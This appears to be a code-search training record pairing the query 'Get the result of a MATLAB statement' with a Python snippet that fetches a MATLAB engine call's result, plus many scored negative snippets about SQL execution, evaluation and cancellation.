[ "0.7865657", "0.77563345", "0.7723488", "0.77118576", "0.7655584", "0.76221126", "0.7604391", "0.7559842", "0.7552165", "0.7419501", "0.7415454", "0.73194754", "0.72359556", "0.7183456", "0.7156729", "0.71380377", "0.7110791", "0.7098136", "0.7089967", "0.7050428", "0.70111907", "0.6968773", "0.6964207", "0.6955929", "0.69195765", "0.689578", "0.689235", "0.68536335", "0.68131983", "0.68097013", "0.6783531", "0.6783054", "0.6770581", "0.6721354", "0.67176485", "0.6657203", "0.66519094", "0.6643741", "0.66340435", "0.6629829", "0.6618661", "0.66153306", "0.6590982", "0.6574309", "0.6536879", "0.65343255", "0.65082854", "0.6501311", "0.6490182", "0.64722025", "0.6461375", "0.6455873", "0.64276063", "0.64150435", "0.6395264", "0.6392255", "0.63860565", "0.63700277", "0.6356902", "0.633506", "0.63311344", "0.6327141", "0.6312418", "0.6306703", "0.63005763", "0.62773526", "0.627653", "0.6275072", "0.62672955", "0.6265655", "0.6262679", "0.62509906", "0.6225705", "0.62125343", "0.62057006", "0.6194008", "0.6164187", "0.614969", "0.6138921", "0.6133452", "0.61320764", "0.6122995", "0.61185443", "0.61015314", "0.6089461", "0.6073423", "0.60703343", "0.606504", "0.6064653", "0.60616773", "0.603468", "0.603468", "0.6024994", "0.6024452", "0.6014998", "0.6014757", "0.6010166", "0.60076106", "0.60012734", "0.60007817", "0.59977454" ]
0.0
-1
Get the result of a MATLAB statement. Parameter
def result(self, timeout=None): self.__validate_engine() if self._retrieved: return self._result """ Following code is used to poll the Ctrl+C every second from keyboard in order to cancel a MATLAB function. """ try: result_ready = self.wait(timeout, pythonengine.waitForFEval) if not result_ready: raise TimeoutError(pythonengine.getMessage('MatlabFunctionTimeout')) self._result = pythonengine.getFEvalResult(self._future,self._nargout, None, out=self._out, err=self._err) self._retrieved = True return self._result except KeyboardInterrupt: self.cancel() if self.cancelled(): print(pythonengine.getMessage('MatlabFunctionCancelled')) except: raise
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def execute_sql_scalar(self, sql):\n msg_type, msg = self.protocol.build_execute_statement(\"sql\", sql)\n self.protocol.send_msg(msg_type, msg)\n result = RowResult(self)\n result.fetch_all()\n if result.count == 0:\n raise InterfaceError(\"No data found\")\n return result[0][0]", "def result(self) -> global___Expression:", "def get_result(self, x):\n return self.i*x", "def get_variable(self, name):\n if self._scalamagic:\n intp = self.scala_interpreter\n intp.interpret(name)\n return intp.last_result()", "def result(self):\r\n # Module(body=[Expr(value=...)])\r\n return self.eval_(ast.parse(self.expr).body[0].value)", "def execute_command_with_return_value(stmt: str) -> dict:\n query_result = __conn__.execute(stmt)\n return query_result.fetchall()", "def getResult(self, param='Flux', src='TARGET'):\n lines = open(self.outgtlike, 'r').readlines()\n\n if param == 'upplim':\n value = -1\n error = 0 # default value\n for line in lines:\n if 'Upper limit' in line: \n value = line.split()[-2]\n else:\n CodeString = ''\n for line in lines:\n if not 'Upper limit' in line:\n CodeString += line[:-1]\n\n MyData = eval(CodeString)\n Values = MyData[src][param].split()\n value = float(Values[0])\n try: \n error = float(Values[2])\n except:\n error = 0\n \n return value, error", "def query(mdx_stmt):", "def select_scalar(self, *args, **kwargs):\n row = self.db_connection.execute(*args, **kwargs).fetchone()\n return None if row is None else row[0]", "def runQuery(tx, query, isReturn=False):\n result = tx.run(query)\n\n if isReturn:\n return result.data()", "def scalar(\n self,\n statement: Executable,\n params: Optional[_CoreSingleExecuteParams] = None,\n *,\n execution_options: OrmExecuteOptionsParameter = util.EMPTY_DICT,\n bind_arguments: Optional[_BindArguments] = None,\n **kw: Any,\n ) -> Any:\n\n return self._execute_internal(\n statement,\n params,\n execution_options=execution_options,\n bind_arguments=bind_arguments,\n _scalar_result=True,\n **kw,\n )", "def evaluate(self) -> int:", "def julia(self, line, cell=None):\n src = unicode(line if cell is None else cell)\n\n caller_frame = inspect.currentframe()\n if caller_frame is None:\n caller_frame = sys._getframe(3) # May not work.\n\n # We assume the caller's frame is the first parent frame not in the\n # IPython module. This seems to work with IPython back to ~v5, and\n # is at least somewhat immune to future IPython internals changes,\n # although by no means guaranteed to be perfect.\n while any(\n (\n caller_frame.f_globals.get(\"__name__\").startswith(\"IPython\"),\n caller_frame.f_globals.get(\"__name__\").startswith(\"julia\"),\n )\n ):\n caller_frame = caller_frame.f_back\n\n return_value = \"nothing\" if src.strip().endswith(\";\") else \"\"\n\n return self._julia.eval(\n \"\"\"\n _PyJuliaHelper.@prepare_for_pyjulia_call begin\n begin %s end\n %s\n end\n \"\"\"\n % (src, return_value)\n )(self.shell.user_ns, caller_frame.f_locals)", "def execute(self, query):\n # Create default return values.\n success = 'ERROR'\n result = None\n # Trim and split query.\n params = query.strip().split()\n if params:\n # Get query method in uppercase.\n method = params[0].upper()\n # Get method definition.\n if method in Matrix.METHODS:\n method_def = Matrix.METHODS[method]\n func = getattr(self, method_def['callable'])\n # Catch known exceptions.\n try:\n # Execute the function with validated parameters.\n validated_params = map(\n self._validate_param,\n method_def['params'],\n params[1:]\n )\n result = func(*validated_params)\n # We can assume that the method was executed succesfully.\n success = 'SUCCESS'\n except (TypeError, ValueError):\n # Do nothing. Default return values handle this case ;).\n pass\n return (success, result)", "async def queryone(self, stmt, *args):\n results = await self.query(stmt, *args)\n if len(results) == 0:\n raise NoResultError()\n elif len(results) > 1:\n raise ValueError(\"Expected 1 result, got %d\" % len(results))\n return results[0]", "def _get_result(self):\r\n \r\n return self._result", "def evaluateValue(compiled_expression):", "def scalars(\n self,\n statement: Executable,\n params: Optional[_CoreAnyExecuteParams] = None,\n *,\n execution_options: OrmExecuteOptionsParameter = util.EMPTY_DICT,\n bind_arguments: Optional[_BindArguments] = None,\n **kw: Any,\n ) -> ScalarResult[Any]:\n\n return self._execute_internal(\n statement,\n params=params,\n execution_options=execution_options,\n bind_arguments=bind_arguments,\n _scalar_result=False, # mypy appreciates this\n **kw,\n ).scalars()", "def result(value):\n return None, value, None", "def a_function_of_mine():\n return 'result'", "def getResult(self, *args, **kwargs):\r\n return None", "def get(self, sql, *args):\n try:\n return next(self.run(sql, *args))\n\n except StopIteration:\n raise utils.NoResult()", "def get_result(self) -> Any:\n ...", "def get_parameter(cur, par):\n cur.execute(\"SELECT value FROM parameters WHERE par='%s';\" % par)\n return cur.fetchone()[0]", "def Execute(self):\n return _gmat_py.GmatCommand_Execute(self)", "def get_result(self):\n if len(self.result_transcripts) > 0:\n return self.result_transcripts[0]\n else:\n return ''", "def execselect(self, sql, vals=()):\n self.conn.ping()\n c = self.conn.cursor()\n c.execute(sql, vals)\n return c.fetchone()", "def SetResultValue(self, *args):\n return _gmat_py.Solver_SetResultValue(self, *args)", "def evaluate(self, script, ret_type, params=[]):\n # Evaluate script\n result = eval(script, {'args': params, 'numpy': numpy})\n logging.debug('Result: {}'.format(result))\n\n bundledRows = SSE.BundledRows()\n if isinstance(result, str) or not hasattr(result, '__iter__'):\n # A single value is returned\n bundledRows.rows.add(duals=self.get_duals(result, ret_type))\n else:\n for row in result:\n # note that each element of the result should represent a row\n bundledRows.rows.add(duals=self.get_duals(row, ret_type))\n\n return bundledRows", "def __call__(self,thing):\n return self.compiled(thing)", "def ASQL(*rest):\n if str(acm.Class()) == \"FTmServer\":\n acm.RunModuleWithParameters(__name__, acm.GetDefaultContext().Name())\n return 'SUCCESS'\n else:\n return 'FAILED'", "def run(self):\n return self.opt().eval()", "def query(self, query):\n cursor = self.database.cursor()\n cursor.execute(query)\n # If it's a query that's expected to return a value (EG: SELECT)\n if query.strip().lower().startswith('select'): return cursor.fetchall()", "def result_stdout(result):\n return result[1][0]", "def evaluate(compiled_expression):", "def get_output(self):\r\n _debug('simq03b_api.get_output')\r\n \r\n x = self.query('OUTP:STAT?')\r\n if x == None: return None\r\n print('Result is ', x) # For knowing the bug that we something have\r\n return int(x)", "def execute(self, statement):\n return self._engine.connect().execute(statement)", "def result(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"result\")", "def result(self):\n return self['result']", "def retrieve_result(self, x, y):\n pass", "def last_result(self):\n # TODO : when evaluating multiline expressions this returns the first result\n lr = self.jiloop.lastRequest()\n res = lr.lineRep().call(\"$result\", spark_jvm_helpers.to_scala_list([]))\n return res", "def execute(self) -> Any:\n return self.function(**self.kwargs)", "def get_result(self):\r\n return conf.lib.clang_getResultType(self)", "def getResult(self):\n return self.ok", "def fetchone(self, sql, val=()):\n cursor = self.__db.cursor()\n cursor.execute(sql, val)\n return cursor.fetchone()", "def value(self) -> global___Expression:", "def value(self) -> global___Expression:", "def get_result(self):\r\n return (self.x, self.lambd)", "def result(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"result\")", "def sql_execute(sql,value):\n cur = c.cursor()\n cur.execute(sql,value)\n results = cur.fetchall()\n return results", "def execute_function(self, function_name_params, function_args=None):\r\n data = self.db.execute(\"select \" + function_name_params, function_args)\r\n return data", "def __matmul__(self, qubit):\n if isinstance(qubit, str):\n qubit = self.get_index(qubit)\n return self.compiled[qubit].y", "def _query_one(self, sql, data=None):\n\n conn = psycopg2.connect(self.connect_args)\n cur = conn.cursor()\n cur.execute(sql, data)\n result = cur.fetchone()\n cur.close()\n conn.close()\n return result", "def get_one(self, sql_command, cmd_param=None):\n if cmd_param:\n count = self._mysql_cursor.execute(sql_command, cmd_param)\n else:\n count = self._mysql_cursor.execute(sql_command)\n\n if count:\n sql_result = self._mysql_cursor.fetchoneDict()\n else:\n sql_result = None\n\n return sql_result", "def eval(self) -> typing.Any:\n return self.expr()", "def test_expr(self):\n x = t.Action(\"returnStuff()\")\n self.assertEqual(writePython(x),\n dd(\"\"\"\n _G_python_1, lastError = eval('returnStuff()', self.globals, _locals), None\n self.considerError(lastError, None)\n _G_python_1\n \"\"\"))", "def _execute(self, stmt) -> sa.engine.ResultProxy:\n return self._engine.execute(stmt)", "async def scalar(self, query, connection=None):\n async with self.connection(connection) as conn:\n r = await conn.execute(query)\n return await r.scalar()", "def value(self):\n if len(self.description) != 1:\n msg = \"Results set with %d cols cannot be treated as value\"\n raise TypeError(msg % len(self.description))\n num_rows = len(self._rows)\n if num_rows == 0:\n raise NoResults()\n elif num_rows > 1:\n raise MultipleResults(num_rows)\n return self._rows[0][0]", "def let_statement(u):\n if u.__class__ is node.let:\n if (u.ret.__class__ is node.ident and\n u.args.__class__ is node.matrix):\n u.args = node.funcall(func_expr=node.ident(\"matlabarray\"),\n args=node.expr_list([u.args]))", "def output(self):\n return self.expr.lhs", "def script_execution_get() -> str | None:\n if (data := script_execution_cv.get()) is None:\n return None\n return data.script_execution", "def test_result(self, expected_matrix):\n return \"Result is correct\" if self.matrix == expected_matrix else \"Result is not correct\"", "def query(self, x):\n # print(f\"Calling oracle with x: {x}, args={self.oracle_args}, kwargs={self.oracle_kwargs}\")\n return self.oracle(x, *self.oracle_args, **self.oracle_kwargs)", "def execute_statement_on_n1ql(self, client, statement, client_context_id=None):\n try:\n response = self.execute_via_sdk(client, statement, False, client_context_id)\n if type(response) == str:\n response = json.loads(response)\n if \"errors\" in response:\n errors = response[\"errors\"]\n else:\n errors = None\n\n if \"results\" in response:\n results = response[\"results\"]\n else:\n results = None\n\n if \"handle\" in response:\n handle = response[\"handle\"]\n else:\n handle = None\n\n if \"metrics\" in response:\n metrics = response[\"metrics\"]\n else:\n metrics = None\n if \"status\" in response:\n status = response[\"status\"]\n else:\n status = None\n return status, metrics, errors, results, handle\n\n except Exception as e:\n raise Exception(str(e))", "def returnOne(self):\n try:\n # self.checkValName()\n self.cursor.execute(self.query % self.val)\n self.results = self.conn.fetchone()\n except Exception as e:\n print \"Query failed: %s \" % e", "def GetResult(self, playerjm):\n return self.score / len(self.scores)", "def test_function(var):\n return var * 2", "def generate_emulate(self, result_ternary, result, mpfr_x, mpfr_rnd):\n emulate_func_name = \"mpfr_log\"\n emulate_func_op = FunctionOperator(emulate_func_name, arg_map = {0: FO_Arg(0), 1: FO_Arg(1), 2: FO_Arg(2)}, require_header = [\"mpfr.h\"]) \n emulate_func = FunctionObject(emulate_func_name, [ML_Mpfr_t, ML_Mpfr_t, ML_Int32], ML_Int32, emulate_func_op)\n mpfr_call = Statement(ReferenceAssign(result_ternary, emulate_func(result, mpfr_x, mpfr_rnd)))\n\n return mpfr_call", "def get_output(self):\r\n x = self.query('OUTP?')\r\n if x == None: return None\r\n return int(x)", "def goto(cls, quad):\n\t\treturn quad.result", "def get_return_value(self):\n return None #Default value to indicate that no meaningful result was returned", "async def one(\n self,\n statement: Executable,\n params: t.Optional[\n t.Union[t.Mapping[str, t.Any], t.Sequence[t.Mapping[str, t.Any]]]\n ] = None,\n execution_options: t.Optional[t.Mapping[str, t.Any]] = None,\n bind_arguments: t.Optional[t.Mapping[str, t.Any]] = None,\n ) -> t.Any:\n result = await self.execute(\n statement, params, execution_options=execution_options, bind_arguments=bind_arguments\n )\n if isinstance(result, sa.engine.CursorResult):\n item = result.one()\n else:\n item = result.scalar_one()\n return item", "def run(self, statement, parameters=None):\n assert not self.closed\n return run(self.connection, statement, parameters)", "def get_value(self, block):\n value = getattr(block, self.parameter_name)\n if self.formula is not None:\n value = self.formula(value)\n\n return value", "def result(self) -> Any:\n if self._result is self._no_result:\n raise UnevaluatedQuandary(\"You haven't left the with block, so the quandary hasn't been evaluated yet\")\n\n return self._result", "def evaluate(self, out, scope):\n value = self.execute(out, scope)\n if value is not None: # Note the distinction here -- 0 is false but we want to print it!\n out.write(self.stringify(value))", "def get_sparql_value(sresult, variable_id):\n val = ''\n if variable_id in sresult:\n val = sresult[variable_id]['value']\n return val", "def test(a):\r\n return (a**2)", "def evaluateMacro(compiled_expression):", "def execute(self, sql):\n with self.connection.cursor() as dbc:\n if sql[-1] != ';':\n sql += ';'\n dbc.execute(sql)\n self.last_row = dbc.lastrowid\n try:\n return dbc.fetchall()\n except:\n return", "def query(query, args=(), one=False):\n cur = get_db().execute(query, args)\n result = cur.fetchall() # result is the answer to the query\n cur.close()\n return (result[0] if result else None) if one else result", "def get(self):\n\n # -------------------------------------------\n # Build command string\n\n cmd = dict()\n\n cmd[\"name_\"] = self.thisptr[\"df_name_\"]\n cmd[\"type_\"] = \"BooleanColumn.get\"\n\n cmd[\"col_\"] = self.thisptr\n\n # -------------------------------------------\n # Send command to engine\n\n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n # -------------------------------------------\n # Make sure everything went well, receive data\n # and close connection\n\n if msg != \"Found!\":\n s.close()\n raise Exception(msg)\n\n mat = comm.recv_boolean_matrix(s)\n\n # -------------------------------------------\n # Close connection, if necessary.\n\n s.close()\n\n # -------------------------------------------\n\n return mat.ravel()", "def test_fun_result(self):\n x = CArray([3, 5])\n correct_result = x[0] ** 2 + x[1] ** 2\n self._test_fun_result(self.fun, x, correct_result.item())", "def load(self, input_parameter: str) -> FormulaResultType:\n raise NotImplementedError()", "def getValue(self):\n # compute the values of my operands\n values = (op.getValue() for op in self.operands)\n # apply my operator\n return self.evaluator(*values)", "def execute(self,sql):\n # self.results = self.execute_silent(sql)\n # return self.results\n # sql = self.format_sql(sql, **kwargs)\n sql_list = sql.split(';')\n for stmt in sql_list:\n if stmt:\n stmt = stmt.strip()\n if len(stmt) < 10:\n break\n result = self.execute_silent(stmt)\n #if result is not None,It's select stmt.\n if result:\n return result", "def getValue(self):\n return _libsbml.Parameter_getValue(self)", "def _call(self, x):\n return self.constant", "def returnOne(self):\n try:\n # self.checkValName()\n self.dbc.execute(self.query, self.val)\n self.results = self.dbc.fetchone()\n except MySQLdb.Error, e:\n print \"Query failed: %s \" % e", "def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out", "def matrix_mult(M, vector1, vector2):\n out = None\n ### YOUR CODE HERE\n pass\n ### END YOUR CODE\n\n return out", "def task_calc():\n return 'What is the result of the expression?'", "def evaluator_side_effect(_, __, math_string):\r\n return mapping[math_string]", "def get_result(self, state):\n pass", "def _call_op_sugar(self, op_idx, *args):\n if not all(isinstance(a, six.integer_types) for a in args):\n raise TypeError('All args passed to call_op must be integers '\n '(LoomResult ids.) Did you forget to call constant?')\n result = self._weaver.CallOp(op_idx, args)\n if not result:\n raise AssertionError('Weaver op call failed: %s' %\n self._weaver.error_string())\n if len(result) == 1:\n return result[0]\n return result", "def evaluate(self):\n pass", "def evaluate(self):\n pass", "def onStatement(self, match):\n\t\treturn self.process(match[0])", "def result(self):\n return self.a" ]
[ "0.5909357", "0.5690119", "0.5548101", "0.5496141", "0.54489595", "0.54063964", "0.5397221", "0.5366224", "0.5346653", "0.52857095", "0.5272317", "0.52682745", "0.5259357", "0.52247185", "0.52104545", "0.51776475", "0.5130771", "0.51298857", "0.51254255", "0.51205885", "0.5114767", "0.5104054", "0.50701547", "0.50664186", "0.5054471", "0.50491834", "0.5039676", "0.50339466", "0.5028968", "0.5023355", "0.5016088", "0.49933735", "0.49875823", "0.496096", "0.49518067", "0.4950829", "0.49430504", "0.4940182", "0.4940075", "0.49381474", "0.4931755", "0.4923867", "0.4915737", "0.49077028", "0.4875746", "0.48754197", "0.48754197", "0.4873794", "0.48606938", "0.48604268", "0.4859955", "0.485938", "0.48587757", "0.48579106", "0.48546013", "0.48502794", "0.484282", "0.48370844", "0.48369464", "0.48258638", "0.48251712", "0.48147956", "0.48086992", "0.4805381", "0.47968122", "0.47949126", "0.47947735", "0.47943965", "0.47904345", "0.47868657", "0.4778198", "0.47757646", "0.4769272", "0.47684452", "0.47610968", "0.47491586", "0.47460005", "0.47440287", "0.4737926", "0.47321898", "0.4728212", "0.4725618", "0.47255763", "0.47236213", "0.47197127", "0.47193384", "0.4719238", "0.47161365", "0.47139853", "0.47071564", "0.4702793", "0.4702793", "0.47026077", "0.46957916", "0.46937487", "0.46901768", "0.4688759", "0.4688759", "0.4687068", "0.46831784" ]
0.4819287
61
Cancel the execution of an evaluation of a MATLAB statement. Returns bool True if the corresponding MATLAB statement can be cancelled; False otherwise. Raises RejectedExecutionError an error occurs if the engine is terminated.
def cancel(self): self.__validate_engine() return pythonengine.cancelFEval(self._future)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def cancelled(self):\n self.__validate_engine()\n return pythonengine.isCancelledFEval(self._future)", "def cancel(self):\n if not self.is_cancelled:\n self.will_change_value_for('is_cancelled')\n self.cancelled = True\n # remove our dependencies so that we're ready, properly behaved operations\n # will honor the cancel flag\n self.dependencies.clear()\n self.did_change_value_for('is_cancelled')\n \n if not self.is_executing and not self.is_finished:\n with self.changing('is_finished'):\n self.finished = True", "def cancel(self):\n with self._done_condition:\n if self._state in [RUNNING, FINISHED]:\n return False\n if self._state == CANCELLED:\n return True\n self._state = CANCELLED\n self._done_condition.notify_all()\n self.__invoke_callbacks()\n return True", "def cancel(self):\n self._logger.warning(\"Comparison run being cancelled.\")\n self._msg_logger.warning(run_analysis_view._text[\"log10\"])\n if hasattr(self, \"_off_thread\"):\n self._off_thread.cancel()", "def cancel(self):\n self._log.debug(\"About to cancel job {0}\".format(self.id))\n resp = self._api.cancel(self.id)\n\n if resp.success:\n self.update()\n return True\n\n if resp.result.type is None:\n # Call was successful but job was unable to be cancelled.\n return False\n\n else:\n raise resp.result", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def cancel(self):\n self.succeeded = False\n self.reject()", "def stop_execution(self):\n self.send_message(\"control.stop\",None)", "def cancel(self):\n resp = self._api.cancel_task(self._job, self.id)\n\n if resp.success:\n return True\n\n if resp.result.type is None:\n # Call was successful but task was unable to be cancelled.\n return False\n\n else:\n raise resp.result", "def stop_evaluator(self):\n\n if self.evaluator_proc is None:\n raise RuntimeError(\"Evaluator not running this process.\")\n\n if isinstance(self.evaluator_proc, Process):\n self.evaluator_proc.terminate()\n\n elif isinstance(self.evaluator_proc, Thread):\n self.evaluator_stop.set()\n self.evaluator_proc.join()\n self.evaluator_stop = None\n\n self.evaluator_proc = None", "def cancel(self) -> bool:\n # Cancel analysis first since it is queued on jobs, then cancel jobs\n # otherwise there can be a race issue when analysis starts running\n # as soon as jobs are cancelled\n analysis_cancelled = self.cancel_analysis()\n jobs_cancelled = self.cancel_jobs()\n return analysis_cancelled and jobs_cancelled", "def stop_query_execution(QueryExecutionId=None):\n pass", "async def cancel(self):\n result = await self.done()\n if result:\n return False\n else:\n await self._cancel()\n return True", "def cancel(self):\n if self.cancelled() or self.done():\n return False\n self._is_done = True\n self._is_cancelled = True\n return True", "def stopIf(self, expr, message):\r\n if expr: self.stop(message)", "def cancel(self):\n return self.RES_OK", "def runloop_cancel():\n raise RunloopCancel()", "def cancel(self):\n\n query = f\"scancel {self.jobid}\"\n if self.cluster:\n query = f\"scancel {self.jobid} --clusters={self.cluster}\"\n\n cmd = BuildTestCommand(query)\n cmd.execute()\n logger.debug(f\"Cancelling Job: {self.jobid} by running: {query}\")\n\n self.poll()\n self._state = \"CANCELLED\"", "def kill(self):\n return self._raw_execute(\"cancel\", {\"job_id\": self.job_id})", "def do_uncancel(self):\r\n self.write({'cancelled': False})", "def stopEvaluationMode(self):\n self.data_ref = self.saved_dat_ref", "def cancel(self) -> None:\n c = self.pgconn.get_cancel()\n c.cancel()", "def cancel(self):\n\t\treturn Job(SDK.PrlJob_Cancel(self.handle)[0])", "def cancel(self):\n GameLoop.getInstance()._cancelation_token = True", "def _abort_if_false(ctx, param, value):\n if not value:\n ctx.abort()", "def abort(self):\r\n LOG(\"Aborting execution\")\r\n self.controller.abort()", "def cancel(self, /, noerror=False):\n\t\tif not self in _running:\n\t\t\tif noerror: return\n\t\t\traise RuntimeError('Not running')\n\t\tfor anim in self.animations:\n\t\t\tanim.cancel(noerror=True)\n\t\t_running.remove(self)\n\t\t_anim_stopped(self)", "def cancel(self, /, noerror=False):\n\t\tif not self in _running:\n\t\t\tif noerror: return\n\t\t\traise RuntimeError('Not running')\n\t\tfor anim in self.animations:\n\t\t\tanim.cancel(noerror=True)\n\t\t_running.remove(self)\n\t\t_anim_stopped(self)", "def cancel():", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def canCancel(self) -> bool:\n ...", "def cancel(self):\n raise NotImplementedError(\n u\"%s: Method not implemented\", self.__class__.__name__)", "def abort(self):\n\n if self.process:\n self.process.kill()\n return True\n else:\n return False", "def stop_workflow_execution(self, cntx, **kwargs):\n execution_id = kwargs.get('execution_id')\n\n return db_api.execution_update(execution_id,\n {\"state\": states.STOPPED})", "def stop(self):\n if self.isCompiled():\n glUseProgram(0)\n else:\n raise Exception(\"el programa no ha sido compilado aun\")", "def cancel(self):\n self.cancelled = True", "def cancel(self):\n self.cancelled = True", "def abort(self):\n if self.process:\n self.process.kill()\n return True\n else:\n return False", "def stop(self):\n command = input(\"Enter anything to finish (or 'exit' to cancel)>>>\")\n return command != 'exit'", "def stop(self):\n calcEngine = CalcEngine.factory(self.client_session)\n return calcEngine.stop()", "def cancel(self, connection):\n if hasattr(connection, \"cancel\"):\n connection.cancel()\n else:\n # A default cancel for databases for which no specific cancel is implemented\n # This will force an exit of the connection context manager\n raise QueryCancelled(\"Query was cancelled\")", "def cancel(self):\n self.waiter.set_result_if_pending(True)\n \n timer = self.timer\n if (timer is not None):\n self.timer = None\n timer.cancel()", "def cancel(self):\n self.__canceled = True", "def stopCond(self):\n\t\treturn False", "def canceled(self):\n with self._done_condition:\n return self._state == CANCELLED", "def cancel_operation(self):\n # <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>\n self.proceed = False\n self.entry_view.destroy()", "async def cancelled(self):\n await self._refresh_and_update()\n return (\n self._operation.HasField(\"error\")\n and self._operation.error.code == code_pb2.CANCELLED\n )", "def cancel(self):", "def cancel(self):", "def cancel(self):", "def _cancel(self, d):\n if self._finished:\n return\n try:\n raise CancelledError()\n except:\n self._caught_failure = failure.Failure()\n self._iterate()", "def cancel_run(self, run_id):\n raise NotImplementedError()", "def cancel(self): #$NON-NLS-1$\r", "def do_cancel(self):\r\n self.write({'cancelled': True})", "def query_abort(self) -> bool:\n return self._workers[threading.get_ident()].abort", "def cancel_work(self, message=\"This test was cancelled by lifeguard script because the test was interrupting progress (taking too long).\"):\n slick = SlickAsPy(self.environment.slickurl + \"/api\")\n status = slick.get_host_status(self.name)\n if status['currentWork'] is not None:\n slick.cancel_result(status['currentWork'], message)", "def cancel_stop(cls):\n cls._set_mode_running()", "def stopUnless(self, expr, message):\r\n if not expr: self.stop(message)", "def cancel(self):\n if self.is_market:\n log.info(\"bo#%s: can't cancel order (market)\" % self.ticket)\n return(False)\n else:\n log.info(\"bo#%s: cancel master order, limit and stop order\" % self.ticket)\n if self.is_cancellable:\n cancel_order(self.order_master)\n cancel_order(self.order_limit)\n cancel_order(self.order_stop)\n self.cancelled.emit(bo=self)\n self.bo_blotter._move_cancelled_order(self)\n return(True)\n else:\n log.info(\"bo#%s: can't cancel order (not cancellable)\" % self.ticket)\n return(False)", "def abort_if_false(ctx, param, value):\n if not value:\n ctx.abort()", "def stop(self):\n if self._current_request is not None:\n self._current_request.addErrback(lambda _: None)\n self._current_request.cancel()\n self._current_request = None\n\n agent_pool = getattr(self._agent, '_pool', None)\n if agent_pool:\n return agent_pool.closeCachedConnections()\n return succeed(None)", "def _cancelCommands(self, reason):\n while self._current:\n cmd = self._current.pop(0)\n cmd.fail(reason)", "def cancel(self):\n self.stop()\n self.make_callback('canceled')", "def cancel(self):\n pass", "def cancel(self):\n self.cancelled.set()", "def _cancel(self):\n self.waiter.set_result_if_pending(None)\n \n timer = self.timer\n if (timer is not None):\n self.timer = None\n timer.cancel()", "def stop(self):\r\n cfunc = lib_importer.windll.DAQmxStopTask\r\n if cfunc.argtypes is None:\r\n with cfunc.arglock:\r\n if cfunc.argtypes is None:\r\n cfunc.argtypes = [lib_importer.task_handle]\r\n\r\n error_code = cfunc(self._handle)\r\n check_for_error(error_code)", "def cancel(self) -> asyncio.Future:\n pass # pragma: no cover", "def evaluate():\n click.echo(\"Not implemented yet. In the future, this command will be used for evaluation.\")\n sys.exit(-2)", "def cancel(self):\n # type: () -> None\n if self.query_id is None or self.is_finished():\n return\n\n self._cancelled = True\n url = self._request.get_url(\"/v1/query/{}\".format(self.query_id))\n logger.debug(\"cancelling query: %s\", self.query_id)\n response = self._request.delete(url)\n logger.info(response)\n if response.status_code == requests.codes.no_content:\n logger.debug(\"query cancelled: %s\", self.query_id)\n return\n self._request.raise_response_error(response)", "def enableJobCancellation(cls) -> None:\n if platform.system() == \"Linux\":\n ddbcpp.sessionimpl.enableJobCancellation()\n else:\n raise RuntimeError(\"This method is only supported on Linux.\")", "def cancel(self):\n self.waiter.set_result_if_pending([])\n \n timer = self.timer\n if (timer is not None):\n self.timer = None\n timer.cancel()", "def cancel_all():\n\twhile _running:\n\t\t_running[0].cancel(noerror=True)", "async def module_command_cancel(self, ctx, parsed):\n waiting = []\n wait_id = None\n cancelled = False\n if parsed.args[\"list\"]:\n waiting = [pair[1] for pair in self._delayed_commands.values()]\n else:\n wait_id = parsed.args[\"id\"]\n try:\n cancelled = True\n task, waiting = self._delayed_commands[wait_id]\n task.cancel()\n except KeyError:\n pass\n await ctx.core_command_cancel(parsed, cancelled, wait_id, waiting)", "def test_cancel(self) -> None:\n context: Dict[str,ArtifactDescriptor] = dict()\n cmd = pycell.python_cell(\n source='import time\\ntime.sleep(5)',\n validate=True\n )\n controller = FakeWorkflowController()\n self.backend.execute_async(\n task=TaskHandle(\n task_id='000',\n project_id=self.PROJECT_ID,\n controller=controller\n ),\n command=cmd,\n artifacts=context\n )\n time.sleep(1)\n self.backend.cancel_task('000')\n time.sleep(5)\n self.assertIsNone(controller.task_id)\n self.assertIsNone(controller.state)", "def abort(self):\n try:\n self.acqRunning = False\n except:\n print('Cannot abort properly')", "def raise_for_failure(self) -> None:\n if not self.is_success():\n raise exc.ExecutionError(self)", "def abort() -> NoReturn:\n raise AbortSignal", "def rstrtmgr_RmCancelCurrentTask(jitter):\n ret_ad, args = jitter.func_args_stdcall([\"dwSessionHandle\"])\n raise RuntimeError('API not implemented')\n jitter.func_ret_stdcall(ret_ad, ret_value)", "def stop_compilation_job(CompilationJobName=None):\n pass", "def provoke_and_handle_SyntaxError():\n try:\n eval(\"x === x\")\n except SyntaxError as se:\n print(f\"Sorry! You can't use eval in that way: {se}\")", "def action_cancel(self):\n ids = isinstance(self.ids, (int)) and [self.ids] or self.ids\n context = self._context or {}\n self.cancel_move()\n self.clear_wh_lines()\n return True", "def cancelled(self):\n return self._is_cancelled", "def cancel_analysis(request):\n cancel_flag[0] = True\n global currently_analyzing\n\n if not currently_analyzing:\n return HttpResponse(\n json.dumps({'error':\"error\"}),\n content_type=\"application/json\"\n )\n else:\n currently_analyzing = False\n return HttpResponse(\n json.dumps({'success':\"success\"}),\n content_type=\"application/json\"\n )", "def stopEvaluationMode(self):\r\n self.dataRef = self.storeDataRef", "def canceled(self):\n self.reject()", "def cancel_all(executions):\n for _, exec_node in executions:\n exec_node.cancel_all_instances()\n raise api.ExecutionCancelled()", "def cancel_inner():\n kernel32.SetEvent(cancel_event)", "def control_cancel(self, wait_for_ready: bool = True) -> None:\n self.__logger.debug('Eva.control_cancel called')\n return self.__http_client.control_cancel(wait_for_ready=wait_for_ready)", "def cancel_exec(\n self, \n project_id: str, \n branch_id: str\n ) -> Optional[List[ModuleHandle]]:\n with self.backend.lock:\n # Get the handle for the head workflow of the specified branch.\n branch = self.projects.get_branch(project_id=project_id, branch_id=branch_id)\n if branch is None:\n return None\n workflow = branch.get_head()\n if workflow is None:\n raise ValueError('empty workflow 